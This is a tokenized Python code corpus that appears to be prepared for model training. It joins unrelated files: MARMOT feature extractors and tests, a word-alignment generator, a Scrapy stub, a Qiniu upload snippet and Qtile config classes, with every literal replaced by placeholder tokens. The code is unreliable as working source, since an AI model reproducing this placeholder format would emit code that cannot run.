vstack ( pool . map ( map_feature_extractor , context_list ) ) ) <EOL> res_dict [ token ] = np . hstack ( extractors_output ) <EOL> return res_dict <EOL> def token_contexts_to_features_categorical ( token_contexts , feature_extractors , workers = <NUM_LIT:1> ) : <EOL> if workers == <NUM_LIT:1> : <EOL> return { token : [ [ x for a_list in [ map_feature_extractor ( ( context , extractor ) ) for extractor in feature_extractors ] for x in a_list ] for context in contexts ] for token , contexts in token_contexts . items ( ) } <EOL> else : <EOL> res_dict = { } <EOL> pool = multi . Pool ( workers ) <EOL> print ( "<STR_LIT>" , feature_extractors ) <EOL> for token , contexts in token_contexts . items ( ) : <EOL> logger . info ( '<STR_LIT>' + token + '<STR_LIT>' + str ( len ( contexts ) ) + '<STR_LIT>' ) <EOL> extractors_output = [ ] <EOL> for extractor in feature_extractors : <EOL> context_list = [ ( cont , extractor ) for cont in contexts ] <EOL> extractors_output . append ( pool . map ( map_feature_extractor , context_list ) ) <EOL> intermediate = [ [ x [ i ] for x in extractors_output ] for i in range ( len ( extractors_output [ <NUM_LIT:0> ] ) ) ] <EOL> res_dict [ token ] = [ flatten ( sl ) for sl in intermediate ] <EOL> return res_dict <EOL> def feature_names_from_extractor_list ( feature_extractors ) : <EOL> """<STR_LIT>""" <EOL> feature_names = [ feature_name for feature_extractor in feature_extractors for feature_name in feature_extractor . get_feature_names ( ) ] <EOL> return feature_names <EOL> def tags_from_contexts ( token_contexts ) : <EOL> """<STR_LIT>""" <EOL> return { token : np . array ( [ context [ '<STR_LIT>' ] for context in contexts ] ) for token , contexts in token_contexts . items ( ) } <EOL> def sync_keys ( dict_a , dict_b ) : <EOL> '''<STR_LIT>''' <EOL> dict_a_keys = set ( dict_a . keys ( ) ) <EOL> dict_b_keys = set ( dict_b . keys ( ) ) <EOL> for k in dict_a_keys . 
symmetric_difference ( dict_b_keys ) : <EOL> if k in dict_a_keys : <EOL> del dict_a [ k ] <EOL> else : <EOL> del dict_b [ k ] </s>
<s> import string <EOL> from marmot . features . feature_extractor import FeatureExtractor <EOL> class PunctuationBigramFeatureExtractor ( FeatureExtractor ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> self . punctuation = string . punctuation <EOL> def get_feature ( self , context_obj ) : <EOL> source_punct , target_punct = <NUM_LIT:0> , <NUM_LIT:0> <EOL> for w in context_obj [ '<STR_LIT:target>' ] : <EOL> if w in self . punctuation : <EOL> target_punct += <NUM_LIT:1> <EOL> for w in context_obj [ '<STR_LIT:source>' ] : <EOL> if w in self . punctuation : <EOL> source_punct += <NUM_LIT:1> <EOL> feature_val = str ( source_punct ) + "<STR_LIT:_>" + str ( target_punct ) <EOL> return feature_val <EOL> def get_feature_name ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_features ( self , context_obj ) : <EOL> return [ self . get_feature ( context_obj ) ] <EOL> def get_feature_names ( self ) : <EOL> return [ self . get_feature_name ( ) ] </s>
<s> import unittest <EOL> from marmot . features . target_token_feature_extractor import TargetTokenFeatureExtractor <EOL> class AlignmentFeatureExtractorTests ( unittest . TestCase ) : <EOL> def test_get_features ( self ) : <EOL> obj = { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT:index>' : <NUM_LIT:2> , '<STR_LIT:target>' : [ u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' ] , '<STR_LIT:source>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:3> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:4> ] ] } <EOL> extractor = TargetTokenFeatureExtractor ( ) <EOL> [ token , left , right ] = extractor . get_features ( obj ) <EOL> self . assertEqual ( token , u'<STR_LIT>' ) <EOL> self . assertEqual ( left , u'<STR_LIT>' ) <EOL> self . assertEqual ( right , u'<STR_LIT:a>' ) <EOL> def test_get_features_two_words ( self ) : <EOL> obj = { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT:index>' : <NUM_LIT:2> , '<STR_LIT:target>' : [ u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' ] , '<STR_LIT:source>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:3> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:4> ] ] } <EOL> extractor = TargetTokenFeatureExtractor ( context_size = <NUM_LIT:2> ) <EOL> [ token , left , right ] = extractor . get_features ( obj ) <EOL> self . assertEqual ( token , u'<STR_LIT>' ) <EOL> self . assertEqual ( left , u'<STR_LIT>' ) <EOL> self . 
assertEqual ( right , u'<STR_LIT>' ) <EOL> def test_first_el ( self ) : <EOL> obj = { '<STR_LIT>' : u'<STR_LIT:a>' , '<STR_LIT:index>' : <NUM_LIT:0> , '<STR_LIT:target>' : [ u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' ] , '<STR_LIT:source>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:3> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:4> ] ] } <EOL> extractor = TargetTokenFeatureExtractor ( context_size = <NUM_LIT:2> ) <EOL> [ token , left , right ] = extractor . get_features ( obj ) <EOL> self . assertEqual ( token , u'<STR_LIT:a>' ) <EOL> self . assertEqual ( left , u'<STR_LIT>' ) <EOL> self . assertEqual ( right , u'<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function <EOL> import numpy as np <EOL> from collections import defaultdict <EOL> from marmot . util . alignments import train_alignments <EOL> from marmot . util . force_align import Aligner <EOL> from marmot . representations . representation_generator import RepresentationGenerator <EOL> from marmot . experiment . import_utils import mk_tmp_dir <EOL> class AlignmentRepresentationGenerator ( RepresentationGenerator ) : <EOL> def __init__ ( self , lex_file , align_model = None , src_file = None , tg_file = None , tmp_dir = None ) : <EOL> tmp_dir = mk_tmp_dir ( tmp_dir ) <EOL> if align_model is None : <EOL> if src_file is not None and tg_file is not None : <EOL> self . align_model = train_alignments ( src_file , tg_file , tmp_dir , align_model = align_model ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> else : <EOL> self . align_model = align_model <EOL> self . lex_prob = self . get_align_prob ( lex_file ) <EOL> def get_alignments ( self , src , tg , align_model ) : <EOL> alignments = [ [ [ ] for j in range ( len ( tg [ i ] ) ) ] for i in range ( len ( tg ) ) ] <EOL> aligner = Aligner ( align_model + '<STR_LIT>' , align_model + '<STR_LIT>' , align_model + '<STR_LIT>' , align_model + '<STR_LIT>' ) <EOL> for idx , ( src_list , tg_list ) in enumerate ( zip ( src , tg ) ) : <EOL> align_string = aligner . align ( '<STR_LIT:U+0020>' . join ( src_list ) + '<STR_LIT>' + '<STR_LIT:U+0020>' . join ( tg_list ) ) <EOL> pairs = align_string . split ( ) <EOL> for p_str in pairs : <EOL> p = p_str . split ( '<STR_LIT:->' ) <EOL> alignments [ idx ] [ int ( p [ <NUM_LIT:1> ] ) ] . append ( int ( p [ <NUM_LIT:0> ] ) ) <EOL> aligner . close ( ) <EOL> return alignments <EOL> def get_align_prob ( self , lex_file ) : <EOL> lex_dict = defaultdict ( lambda : defaultdict ( float ) ) <EOL> for line in open ( lex_file ) : <EOL> chunks = line [ : - <NUM_LIT:1> ] . decode ( '<STR_LIT:utf-8>' ) . 
split ( ) <EOL> assert ( len ( chunks ) == <NUM_LIT:3> ) , "<STR_LIT>" . format ( line ) <EOL> val = float ( chunks [ <NUM_LIT:2> ] ) <EOL> lex_dict [ chunks [ <NUM_LIT:0> ] ] [ chunks [ <NUM_LIT:1> ] ] = val <EOL> return lex_dict <EOL> def generate ( self , data_obj ) : <EOL> if '<STR_LIT:target>' not in data_obj or '<STR_LIT:source>' not in data_obj : <EOL> print ( "<STR_LIT>" ) <EOL> assert ( len ( data_obj [ '<STR_LIT:target>' ] ) == len ( data_obj [ '<STR_LIT:source>' ] ) ) <EOL> all_alignments = self . get_alignments ( data_obj [ '<STR_LIT:source>' ] , data_obj [ '<STR_LIT:target>' ] , self . align_model ) <EOL> unique_alignments = [ ] <EOL> for seq_idx , al_sequence in enumerate ( all_alignments ) : <EOL> seq_alignments = [ ] <EOL> for w_idx , al_list in enumerate ( al_sequence ) : <EOL> if len ( al_list ) > <NUM_LIT:1> : <EOL> target_word = data_obj [ '<STR_LIT:target>' ] [ seq_idx ] [ w_idx ] <EOL> source_words = [ data_obj [ '<STR_LIT:source>' ] [ seq_idx ] [ i ] for i in al_list ] <EOL> probs = [ self . lex_prob [ target_word ] [ s ] for s in source_words ] <EOL> seq_alignments . append ( al_list [ np . argmax ( probs ) ] ) <EOL> elif len ( al_list ) == <NUM_LIT:0> : <EOL> seq_alignments . append ( None ) <EOL> elif len ( al_list ) == <NUM_LIT:1> : <EOL> seq_alignments . append ( al_list [ <NUM_LIT:0> ] ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> unique_alignments . append ( seq_alignments ) <EOL> data_obj [ '<STR_LIT>' ] = unique_alignments <EOL> return data_obj </s>
<s> import unittest , os <EOL> from marmot . util . corpus_context_creator import CorpusContextCreator <EOL> class TestRunExperiment ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> module_path = os . path . dirname ( __file__ ) <EOL> self . module_path = module_path <EOL> self . important_tokens = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> test_contexts = [ { '<STR_LIT:index>' : <NUM_LIT> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT:i>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT:to>' , u'<STR_LIT>' , u'<STR_LIT:to>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , { '<STR_LIT:index>' : <NUM_LIT:3> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT:->' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , { '<STR_LIT:index>' : <NUM_LIT> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , 
u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:to>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:all>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , { '<STR_LIT:index>' : <NUM_LIT> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:state>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT:to>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , { '<STR_LIT:index>' : <NUM_LIT:5> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , { '<STR_LIT:index>' : <NUM_LIT:10> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:->' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:to>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , 
u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , ] <EOL> self . corpus_cc = CorpusContextCreator ( test_contexts ) <EOL> def test_get_contexts ( self ) : <EOL> and_contexts = self . corpus_cc . get_contexts ( '<STR_LIT>' ) <EOL> self . assertTrue ( len ( and_contexts ) == <NUM_LIT:4> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from scrapy . spider import Spider <EOL> from scrapy . http import Request <EOL> from scrapy . selector import Selector <EOL> from scrapy import log <EOL> from . . items import CrawlItem <EOL> class ListSpider ( Spider ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def parse ( self , response ) : <EOL> doc = Selector ( response ) <EOL> item = CrawlItem ( ) <EOL> section = doc . xpath ( "<STR_LIT>" ) <EOL> for sect in section : <EOL> pass <EOL> class DetailSpider ( Spider ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def parse ( self , response ) : <EOL> pass </s>
<s> from qiniu import Auth , put_file , etag , urlsafe_base64_encode <EOL> import qiniu . config <EOL> access_key = '<STR_LIT>' <EOL> secret_key = '<STR_LIT>' <EOL> q = Auth ( access_key , secret_key ) <EOL> bucket_name = '<STR_LIT>' <EOL> key = '<STR_LIT>' ; <EOL> token = q . upload_token ( bucket_name , key , <NUM_LIT> ) <EOL> localfile = '<STR_LIT>' <EOL> ret , info = put_file ( token , key , localfile ) <EOL> print ( info ) <EOL> assert ret [ '<STR_LIT:key>' ] == key <EOL> assert ret [ '<STR_LIT>' ] == etag ( localfile ) </s>
<s> from . import command <EOL> from . import hook <EOL> from . import utils <EOL> from . import xcbq <EOL> from six import MAXSIZE <EOL> import warnings <EOL> class Key ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , modifiers , key , * commands , ** kwds ) : <EOL> self . modifiers = modifiers <EOL> self . key = key <EOL> self . commands = commands <EOL> self . desc = kwds . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if key not in xcbq . keysyms : <EOL> raise utils . QtileError ( "<STR_LIT>" % key ) <EOL> self . keysym = xcbq . keysyms [ key ] <EOL> try : <EOL> self . modmask = utils . translate_masks ( self . modifiers ) <EOL> except KeyError as v : <EOL> raise utils . QtileError ( v ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . modifiers , self . key ) <EOL> class Drag ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , modifiers , button , * commands , ** kwargs ) : <EOL> self . start = kwargs . get ( "<STR_LIT:start>" ) <EOL> self . focus = kwargs . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . modifiers = modifiers <EOL> self . button = button <EOL> self . commands = commands <EOL> try : <EOL> self . button_code = int ( self . button . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . modmask = utils . translate_masks ( self . modifiers ) <EOL> except KeyError as v : <EOL> raise utils . QtileError ( v ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . modifiers , self . button ) <EOL> class Click ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , modifiers , button , * commands , ** kwargs ) : <EOL> self . focus = kwargs . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . modifiers = modifiers <EOL> self . button = button <EOL> self . commands = commands <EOL> try : <EOL> self . button_code = int ( self . button . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . modmask = utils . translate_masks ( self . modifiers ) <EOL> except KeyError as v : <EOL> raise utils . 
QtileError ( v ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . modifiers , self . button ) <EOL> class EzConfig ( object ) : <EOL> """<STR_LIT>""" <EOL> modifier_keys = { <EOL> '<STR_LIT:M>' : '<STR_LIT>' , <EOL> '<STR_LIT:A>' : '<STR_LIT>' , <EOL> '<STR_LIT:S>' : '<STR_LIT>' , <EOL> '<STR_LIT:C>' : '<STR_LIT>' , <EOL> } <EOL> def parse ( self , spec ) : <EOL> """<STR_LIT>""" <EOL> mods = [ ] <EOL> keys = [ ] <EOL> for key in spec . split ( '<STR_LIT:->' ) : <EOL> if not key : <EOL> break <EOL> if key in self . modifier_keys : <EOL> if keys : <EOL> msg = '<STR_LIT>' <EOL> raise utils . QtileError ( msg % spec ) <EOL> mods . append ( self . modifier_keys [ key ] ) <EOL> continue <EOL> if len ( key ) == <NUM_LIT:1> : <EOL> keys . append ( key ) <EOL> continue <EOL> if len ( key ) > <NUM_LIT:3> and key [ <NUM_LIT:0> ] == '<STR_LIT:<>' and key [ - <NUM_LIT:1> ] == '<STR_LIT:>>' : <EOL> keys . append ( key [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> continue <EOL> if not keys : <EOL> msg = '<STR_LIT>' <EOL> raise utils . QtileError ( msg % spec ) <EOL> if len ( keys ) > <NUM_LIT:1> : <EOL> msg = '<STR_LIT>' % spec <EOL> raise utils . QtileError ( msg ) <EOL> return mods , keys [ <NUM_LIT:0> ] <EOL> class EzKey ( EzConfig , Key ) : <EOL> def __init__ ( self , keydef , * commands ) : <EOL> modkeys , key = self . parse ( keydef ) <EOL> super ( EzKey , self ) . __init__ ( modkeys , key , * commands ) <EOL> class EzClick ( EzConfig , Click ) : <EOL> def __init__ ( self , btndef , * commands , ** kwargs ) : <EOL> modkeys , button = self . parse ( btndef ) <EOL> button = '<STR_LIT>' % button <EOL> super ( EzClick , self ) . __init__ ( modkeys , button , * commands , ** kwargs ) <EOL> class EzDrag ( EzConfig , Drag ) : <EOL> def __init__ ( self , btndef , * commands , ** kwargs ) : <EOL> modkeys , button = self . parse ( btndef ) <EOL> button = '<STR_LIT>' % button <EOL> super ( EzDrag , self ) . 
__init__ ( modkeys , button , * commands , ** kwargs ) <EOL> class ScreenRect ( object ) : <EOL> def __init__ ( self , x , y , width , height ) : <EOL> self . x = x <EOL> self . y = y <EOL> self . width = width <EOL> self . height = height <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> self . x , self . y , <EOL> self . width , self . height <EOL> ) <EOL> def hsplit ( self , columnwidth ) : <EOL> assert columnwidth > <NUM_LIT:0> <EOL> assert columnwidth < self . width <EOL> return ( <EOL> self . __class__ ( self . x , self . y , columnwidth , self . height ) , <EOL> self . __class__ ( <EOL> self . x + columnwidth , self . y , <EOL> self . width - columnwidth , self . height <EOL> ) <EOL> ) <EOL> def vsplit ( self , rowheight ) : <EOL> assert rowheight > <NUM_LIT:0> <EOL> assert rowheight < self . height <EOL> return ( <EOL> self . __class__ ( self . x , self . y , self . width , rowheight ) , <EOL> self . __class__ ( <EOL> self . x , self . y + rowheight , <EOL> self . width , self . height - rowheight <EOL> ) <EOL> ) <EOL> class Screen ( command . CommandObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , top = None , bottom = None , left = None , right = None , <EOL> x = None , y = None , width = None , height = None ) : <EOL> self . group = None <EOL> self . previous_group = None <EOL> self . top = top <EOL> self . bottom = bottom <EOL> self . left = left <EOL> self . right = right <EOL> self . qtile = None <EOL> self . index = None <EOL> self . x = x <EOL> self . y = y <EOL> self . width = width <EOL> self . height = height <EOL> def _configure ( self , qtile , index , x , y , width , height , group ) : <EOL> self . qtile = qtile <EOL> self . index = index <EOL> self . x = x <EOL> self . y = y <EOL> self . width = width <EOL> self . height = height <EOL> self . setGroup ( group ) <EOL> for i in self . gaps : <EOL> i . 
_configure ( qtile , self ) <EOL> @ property <EOL> def gaps ( self ) : <EOL> return ( i for i in [ self . top , self . bottom , self . left , self . right ] if i ) <EOL> @ property <EOL> def dx ( self ) : <EOL> return self . x + self . left . size if self . left else self . x <EOL> @ property <EOL> def dy ( self ) : <EOL> return self . y + self . top . size if self . top else self . y <EOL> @ property <EOL> def dwidth ( self ) : <EOL> val = self . width <EOL> if self . left : <EOL> val -= self . left . size <EOL> if self . right : <EOL> val -= self . right . size <EOL> return val <EOL> @ property <EOL> def dheight ( self ) : <EOL> val = self . height <EOL> if self . top : <EOL> val -= self . top . size <EOL> if self . bottom : <EOL> val -= self . bottom . size <EOL> return val <EOL> def get_rect ( self ) : <EOL> return ScreenRect ( self . dx , self . dy , self . dwidth , self . dheight ) <EOL> def setGroup ( self , new_group , save_prev = True ) : <EOL> """<STR_LIT>""" <EOL> if new_group . screen == self : <EOL> return <EOL> if save_prev : <EOL> self . previous_group = self . group <EOL> if new_group is None : <EOL> return <EOL> if new_group . screen : <EOL> g1 = self . group <EOL> s1 = self <EOL> g2 = new_group <EOL> s2 = new_group . screen <EOL> s2 . group = g1 <EOL> g1 . _setScreen ( s2 ) <EOL> s1 . group = g2 <EOL> g2 . _setScreen ( s1 ) <EOL> else : <EOL> old_group = self . group <EOL> self . group = new_group <EOL> new_group . _setScreen ( self ) <EOL> if old_group is not None : <EOL> old_group . _setScreen ( None ) <EOL> hook . fire ( "<STR_LIT>" ) <EOL> hook . fire ( "<STR_LIT>" ) <EOL> hook . fire ( <EOL> "<STR_LIT>" , <EOL> self . group . layouts [ self . group . currentLayout ] , <EOL> self . group <EOL> ) <EOL> def _items ( self , name ) : <EOL> if name == "<STR_LIT>" : <EOL> return ( True , list ( range ( len ( self . group . layouts ) ) ) ) <EOL> elif name == "<STR_LIT>" : <EOL> return ( True , [ i . window . wid for i in self . group . 
windows ] ) <EOL> elif name == "<STR_LIT:bar>" : <EOL> return ( False , [ x . position for x in self . gaps ] ) <EOL> def _select ( self , name , sel ) : <EOL> if name == "<STR_LIT>" : <EOL> if sel is None : <EOL> return self . group . layout <EOL> else : <EOL> return utils . lget ( self . group . layouts , sel ) <EOL> elif name == "<STR_LIT>" : <EOL> if sel is None : <EOL> return self . group . currentWindow <EOL> else : <EOL> for i in self . group . windows : <EOL> if i . window . wid == sel : <EOL> return i <EOL> elif name == "<STR_LIT:bar>" : <EOL> return getattr ( self , sel ) <EOL> def resize ( self , x = None , y = None , w = None , h = None ) : <EOL> x = x or self . x <EOL> y = y or self . y <EOL> w = w or self . width <EOL> h = h or self . height <EOL> self . _configure ( self . qtile , self . index , x , y , w , h , self . group ) <EOL> for bar in [ self . top , self . bottom , self . left , self . right ] : <EOL> if bar : <EOL> bar . draw ( ) <EOL> self . qtile . call_soon ( self . group . layoutAll ( ) ) <EOL> def cmd_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( <EOL> index = self . index , <EOL> width = self . width , <EOL> height = self . height , <EOL> x = self . x , <EOL> y = self . y <EOL> ) <EOL> def cmd_resize ( self , x = None , y = None , w = None , h = None ) : <EOL> """<STR_LIT>""" <EOL> self . resize ( x , y , w , h ) <EOL> def cmd_next_group ( self , skip_empty = False , skip_managed = False ) : <EOL> """<STR_LIT>""" <EOL> n = self . group . nextGroup ( skip_empty , skip_managed ) <EOL> self . setGroup ( n ) <EOL> return n . name <EOL> def cmd_prev_group ( self , skip_empty = False , skip_managed = False ) : <EOL> """<STR_LIT>""" <EOL> n = self . group . prevGroup ( skip_empty , skip_managed ) <EOL> self . setGroup ( n ) <EOL> return n . name <EOL> def cmd_toggle_group ( self , group_name = None ) : <EOL> """<STR_LIT>""" <EOL> group = self . qtile . groupMap . get ( group_name ) <EOL> if group in ( self . 
group , None ) : <EOL> group = self . previous_group <EOL> self . setGroup ( group ) <EOL> def cmd_togglegroup ( self , groupName = None ) : <EOL> """<STR_LIT>""" <EOL> warnings . warn ( "<STR_LIT>" , DeprecationWarning ) <EOL> self . cmd_toggle_group ( groupName ) <EOL> class Group ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , matches = None , exclusive = False , <EOL> spawn = None , layout = None , layouts = None , persist = True , init = True , <EOL> layout_opts = None , screen_affinity = None , position = MAXSIZE ) : <EOL> self . name = name <EOL> self . exclusive = exclusive <EOL> self . spawn = spawn <EOL> self . layout = layout <EOL> self . layouts = layouts or [ ] <EOL> self . persist = persist <EOL> self . init = init <EOL> self . matches = matches or [ ] <EOL> self . layout_opts = layout_opts or { } <EOL> self . screen_affinity = screen_affinity <EOL> self . position = position <EOL> def __repr__ ( self ) : <EOL> attrs = utils . describe_attributes ( self , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return '<STR_LIT>' % ( self . name , attrs ) <EOL> class Match ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , title = None , wm_class = None , role = None , wm_type = None , 